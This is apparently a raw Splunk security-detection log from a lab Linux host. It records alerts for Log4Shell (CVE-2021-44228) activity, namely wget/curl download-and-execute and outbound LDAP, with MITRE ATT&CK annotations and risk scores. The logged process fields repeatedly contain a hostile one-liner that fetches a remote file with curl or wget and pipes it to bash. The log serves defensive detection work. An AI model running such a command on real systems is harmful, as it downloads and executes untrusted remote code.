annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639761, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="T1190", annotations._all="DE.AE", annotations._all="CVE-2021-44228", annotations._all="CIS 13", annotations._all="Stage:Initial Access", annotations._all="Source:Endpoint", annotations._all="T1059", annotations._all="Command and Control", annotations._all="PR.PT", annotations._all="CIS 12", annotations._all="Log4Shell CVE-2021-44228", annotations._all="DE.CM", annotations._all="PR.DS", annotations._all="Actions on Objectives", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642639761, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="T1190", annotations._all="DE.AE", annotations._all="CVE-2021-44228", annotations._all="CIS 13", annotations._all="Stage:Initial Access", annotations._all="Source:Endpoint", annotations._all="T1059", annotations._all="Command and Control", annotations._all="PR.PT", annotations._all="CIS 12", annotations._all="Log4Shell CVE-2021-44228", annotations._all="DE.CM", annotations._all="PR.DS", annotations._all="Actions on Objectives", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", 